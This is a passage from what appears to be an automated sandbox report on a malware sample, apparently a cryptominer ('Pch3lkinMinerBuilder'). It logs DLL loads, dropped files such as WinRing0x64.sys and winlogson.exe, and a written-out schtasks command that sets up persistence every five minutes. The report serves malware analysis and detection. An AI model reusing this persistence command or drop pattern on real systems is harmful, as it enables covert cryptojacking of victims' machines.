                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: n7ZKbApaa3.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                Source: n7ZKbApaa3.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Installer.exe, 0000001F.00000003.1911606437.0000000003B22000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1911910899.000000000038C000.00000004.00000001.01000000.0000000A.sdmp, RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002540000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000021.00000002.1979634479.0000000002498000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.33.dr
                Source: n7ZKbApaa3.dllStatic PE information: real checksum: 0x0 should be: 0x71a58
                Source: winlogson.exe.33.drStatic PE information: real checksum: 0x7e7c4c should be: 0x26e5b
                Source: Installer.exe.29.drStatic PE information: real checksum: 0x3425e should be: 0xa3dbd
                Source: 7z.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                Source: 7z.dll.11.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                Source: winlogson.exe.33.drStatic PE information: section name: .xdata
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECADA4 push esi; retf 7_3_02ECADA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECADA4 push esi; retf 7_3_02ECADA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECADA4 push esi; retf 7_3_02ECADA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC92D5 push ss; ret 7_3_02EC92DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECA42F push esi; retf 7_3_02ECA432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02ECADA4 push esi; retf 7_3_02ECADA7

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sys
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
